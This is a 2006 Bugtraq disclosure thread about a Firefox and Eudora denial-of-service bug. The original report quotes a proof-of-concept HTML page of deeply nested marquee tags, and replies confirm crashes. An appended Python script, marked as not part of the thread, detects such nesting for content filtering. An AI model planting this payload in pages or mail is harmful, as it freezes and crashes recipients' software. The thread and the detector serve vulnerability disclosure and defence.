I have seen that the exploit also freezes Eudora 6.2.1.2. I was trying to
open the original mail in Eudora mail client and whenever I clicked on the
mail, Eudora stopped responding. I had to restart the application.
regards
-Sanjay Rawat
At 09:52 PM 5/31/2006, Andy wrote:
>Crashed my FF 1.5.0.3 straight away on a fully patched XP Pro Service Pack 2
>
>Andy
>
>-----Original Message-----
>From: Josh Zlatin-Amishav [mailto:josh (at) tkos.co (dot) il]
>Sent: 31 May 2006 16:50
>To: co296 (at) aol (dot) com
>Cc: bugtraq (at) securityfocus (dot) com
>Subject: Re: Fire fox dos exploit
>
>On Tue, 30 May 2006, co296 (at) aol (dot) com wrote:
>
> > I have found a problem which causes denial of service on Firefox browser
>
>Can you give us some more details, like versions and platforms affected? I
>was unable to recreate this flaw using firefox 1.5.dfsg+1.5.0 on Debian
>unstable.
>
>--
> - Josh
>
> >
> > Credit: to n00b for finding this bug..
> >
> > the problem lies in the
> >
> > <marquee> html tag uses 100% cpu and crashes the browser..
> >
> > Following proof of concept available
> >
> > <html>
> > <head>
> > <title>Credit to n00b..</title>
> > <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
> > </head>
> >
> > <body>
> >
><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee
><mar
>quee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><ma
rquee
> ><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee
><ma
>rquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><m
arque
>e><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marqu
ee><m
>arquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><
marqu
>ee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marq
uee><
>marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marq
>uee></marquee></marquee></marquee></marquee></marquee></marquee></marqu
ee></
>marquee></marquee></marquee></marquee></marquee></marquee></marquee></m
arque
>e></marquee></marquee></marquee></marquee></marquee></marquee></marquee
></ma
>rquee></marquee></marquee></marquee></marquee></marquee></marquee></mar
quee>
></marquee></marquee></marquee></marquee></marquee></marquee></marquee><
/marq
> ue
> >
>e></marquee></marquee></marquee></marquee></marquee></marquee></marquee
></ma
>rquee></marquee></marquee></marquee></marquee></marquee></marquee></mar
quee>
></marquee></marquee></marquee></marquee></marquee></marquee></marquee><
/marq
>uee></marquee></marquee></marquee></marquee></marquee></marquee></marqu
ee>
> > </body>
> > </html>
> >
> >
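A defensive check for the nesting pattern in the proof of concept above, added here as an example that is not part of the original thread: it measures how deeply a single tag is nested inside itself, in one linear pass, so a mail or web content filter can flag such a body before a renderer sees it. The limits, the names `NestingMeter` and `assess`, and both sample inputs are assumptions made for this illustration.

```python
from collections import Counter
from html.parser import HTMLParser

# Elements without a closing tag; they never stay open, so they are not pushed.
VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input",
        "link", "meta", "source", "track", "wbr"}

class NestingMeter(HTMLParser):
    """Streams HTML and records overall depth and per-tag self-nesting."""

    def __init__(self):
        super().__init__()
        self.stack = []            # currently open elements
        self.open_now = Counter()  # tag -> how many of it are open right now
        self.peak = Counter()      # tag -> most of it ever open at once
        self.max_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in VOID:
            return
        self.stack.append(tag)
        self.open_now[tag] += 1
        self.peak[tag] = max(self.peak[tag], self.open_now[tag])
        self.max_depth = max(self.max_depth, len(self.stack))

    def handle_endtag(self, tag):
        if not self.open_now[tag]:  # stray close tag: ignore in O(1)
            return
        while self.stack:           # also closes anything left open inside it
            top = self.stack.pop()
            self.open_now[top] -= 1
            if top == tag:
                break

def assess(html, self_nest_limit=16, depth_limit=256):
    """Return nesting metrics and whether they exceed the (assumed) limits."""
    meter = NestingMeter()
    meter.feed(html)
    meter.close()
    tag, count = max(meter.peak.items(), key=lambda kv: kv[1], default=("", 0))
    flagged = count > self_nest_limit or meter.max_depth > depth_limit
    return {"depth": meter.max_depth, "tag": tag, "count": count, "flagged": flagged}

# Constructed samples: ordinary mail markup and a body shaped like the report.
BENIGN = ("<html><head><meta charset='utf-8'></head><body><p>Hi <b>all</b><br>"
          "<marquee>sale</marquee></p></body></html>")
NESTED = "<html><body>" + "<marquee>" * 40 + "x" + "</marquee>" * 40 + "</body></html>"

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("nested", NESTED)):
        print(name, assess(doc))
```

The per-tag counters keep the check linear in the input size, so the filter itself does not become the slow path on hostile markup.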